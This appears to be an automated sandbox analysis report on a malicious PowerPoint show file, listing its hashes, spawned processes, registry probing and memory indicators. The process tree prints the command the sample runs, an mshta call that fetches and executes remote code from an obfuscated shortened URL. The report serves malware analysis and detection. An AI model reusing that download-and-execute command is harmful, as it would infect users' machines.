Analysis
-
max time kernel
146s -
max time network
145s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
05-03-2021 05:43
Static task
static1
Behavioral task
behavioral1
Sample
a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca.pps
Resource
win7v20201028
Behavioral task
behavioral2
Sample
a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca.pps
Resource
win10v20201028
General
-
Target
a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca.pps
-
Size
141KB
-
MD5
53f09cdb89620ee0d02c006d5bdf758f
-
SHA1
caf1ff6f5563d23eac7c547f2309c0608ae3029f
-
SHA256
a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca
-
SHA512
60374ee268f24ce193c860caf5ccf779a94388f44923bf2ecd5ba3273dfe937c4d8f960cdd906f56eccd39a81623636a2b07c22f116de8f1ee48cbe5f89b8a94
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mSHtA.exeping.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 1244 984 mSHtA.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2056 984 ping.exe POWERPNT.EXE -
Blocklisted process makes network request 10 IoCs
Processes:
mSHtA.exeflow pid process 34 1244 mSHtA.exe 36 1244 mSHtA.exe 38 1244 mSHtA.exe 41 1244 mSHtA.exe 42 1244 mSHtA.exe 45 1244 mSHtA.exe 46 1244 mSHtA.exe 47 1244 mSHtA.exe 48 1244 mSHtA.exe 50 1244 mSHtA.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2712 1244 WerFault.exe mSHtA.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
mSHtA.exePOWERPNT.EXEwinword.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mSHtA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mSHtA.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winword.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
POWERPNT.EXEwinword.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU winword.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 3 IoCs
Processes:
POWERPNT.EXEwinword.exepid process 984 POWERPNT.EXE 1492 winword.exe 1492 winword.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
WerFault.exepid process 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
WerFault.exedescription pid process Token: SeDebugPrivilege 2712 WerFault.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
POWERPNT.EXEwinword.exemSHtA.exepid process 984 POWERPNT.EXE 1492 winword.exe 1492 winword.exe 1492 winword.exe 1244 mSHtA.exe 984 POWERPNT.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
POWERPNT.EXEdescription pid process target process PID 984 wrote to memory of 1244 984 POWERPNT.EXE mSHtA.exe PID 984 wrote to memory of 1244 984 POWERPNT.EXE mSHtA.exe PID 984 wrote to memory of 2056 984 POWERPNT.EXE ping.exe PID 984 wrote to memory of 2056 984 POWERPNT.EXE ping.exe PID 984 wrote to memory of 1492 984 POWERPNT.EXE winword.exe PID 984 wrote to memory of 1492 984 POWERPNT.EXE winword.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca.pps" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\mSHtA.exemSHtA http://12384928198391823%12384928198391823@j.mp/akawdowdkwoapdlwnduhand2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1244 -s 25883⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\ping.exeping2⤵
- Process spawned unexpected child process
- Runs ping.exe
-
C:\Program Files\Microsoft Office\Root\Office16\winword.exewinword2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868MD5
50308e654d10f196ff97f70c8ae32be8
SHA144af0ff1918b729945b6b7052250f13cfe2e154a
SHA256bb4aa4afd64c31f895454eb788ddab2d6da854e80b59d55822cd7beb6b3d0ccb
SHA512ba8f253774cb7438361a48f4e671a0417ae450095f062761e6a4bd5f9a422f4276af28ec3ab7135db24843600276fb7fa41284753bc6feda6aeb22ac45ad32a4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868MD5
37f36f73f12f6bc33e6626852def24a2
SHA1db33554321fcc997d79622d0885db84ec73893cb
SHA256b0189497d991bfd745a8cad8536f3b2c7307c324beacaba3fd3cf0cdc3133c58
SHA51272264ae3e28d3eff0c3569fb26a2aa5baf68675f28384f81face16a0d9fbab52fe49771ea575a448154d02c357a08f5f9d2281913ef0b79ae2bdf307a5f75712
-
memory/984-18-0x00007FF90A2A0000-0x00007FF90BE7D000-memory.dmpFilesize
27.9MB
-
memory/984-21-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmpFilesize
64KB
-
memory/984-6-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmpFilesize
64KB
-
memory/984-5-0x00007FF909C60000-0x00007FF90A297000-memory.dmpFilesize
6.2MB
-
memory/984-22-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmpFilesize
64KB
-
memory/984-4-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmpFilesize
64KB
-
memory/984-3-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmpFilesize
64KB
-
memory/984-2-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmpFilesize
64KB
-
memory/984-19-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmpFilesize
64KB
-
memory/984-20-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmpFilesize
64KB
-
memory/1244-7-0x0000000000000000-mapping.dmp
-
memory/1492-9-0x0000000000000000-mapping.dmp
-
memory/1492-13-0x00007FF909C60000-0x00007FF90A297000-memory.dmpFilesize
6.2MB
-
memory/2056-8-0x0000000000000000-mapping.dmp
-
memory/2712-15-0x0000020C132B0000-0x0000020C132B1000-memory.dmpFilesize
4KB